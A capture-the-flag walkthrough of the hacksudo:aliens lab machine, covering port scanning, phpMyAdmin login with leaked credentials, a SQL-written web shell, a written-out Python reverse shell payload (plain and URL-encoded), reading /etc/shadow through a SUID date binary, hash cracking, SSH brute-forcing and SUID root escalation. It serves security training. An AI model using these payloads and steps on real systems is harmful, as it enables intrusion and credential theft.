This is the write-up for hacksudo:aliens. The CTF machine is available for download here. Vishal Waghmare is the creator of this CTF.
Let’s begin with the nmap scan, to discover open ports. The target IP for me is 192.168.9.71. Command: sudo nmap -p- 192.168.9.71
Targeted nmap scan for ports 22,80 and 9000. Command used: sudo nmap -sV -sC -p22,80,9000 192.168.9.71
Directory enumeration on port 80 using gobuster.
gobuster dir — url http://192.168.9.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25
Lets download mysql.bak file.We got some credentials.
As previous nmap scan shows phpMyAdmin is running on port 9000, used above creds which lets me login.
Navigating to mysql — ->users database able to see few users and their password hash.
So available users are root,phpmyadmin,shovon,hacksudo and vishal.
I spent good amount of time to get shell access on this box using phpmyadmin web console, then I found the good article here. As per the article I followed below steps.
- Clicked on new. Create a new database.I named it as shell_it.
2. Now click on shell it and we need to use SQL as to write file.
3. Click on GO and execute the query.The message shows that the query is successful.
4. Now visit the URL http://192.168.9.71/my_shell.php?cmd=id;hostname. We got command execution on the box.
Time to get the reverse shell.
- Found the python reverse shell payload here. The box has python3 installed on it. Used below payload after URL encode
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'%70%79%74%68%6f%6e%33%20%2d%63%20%27%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%22%31%39%32%2e%31%36%38%2e%39%2e%33%22%2c%34%34%35%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%69%6d%70%6f%72%74%20%70%74%79%3b%20%70%74%79%2e%73%70%61%77%6e%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%27
2. Start netcat listener on port 443 on kali machine.
3. Reverse shell on port 443.
Don’t have enough permission as we are www-data user. Basic enumeration using find command to find suid binaries. date has suid set.
Privilege escalation to user hacksudo.
As per gtfobins, we can read files if suid is set for date binary.
Tried to read the /etc/shadow file. Got the hash for the user hacksuod. Cracked it using john.
- created a variable my_shadow with value “/etc/shadow”.
- used /usr/bin/date -f $my_shadow to read hashes.
3. Copied the hacksudo hash into a file and used john to crack it with wordlist rockyou.txt.
Login as user hacksudo.
User Flag
We can read the .bash_history file a basic enumeration. We can see the command cpulimit is used with /bin/bash -p as argument. Find also shows that it has a suid bit set. Lets use it to escalate the privilege to root.
There is another method to get user hacksuod on the box. As we discovered root,phpmyadmin,shovon,hacksudo and vishal users through phpMyAdmin console. In the background I used hydra to brute-force ssh login with users and got successful as hacksudo.
Tool Used:
- nmap
- hydra
- curl
- john
References:
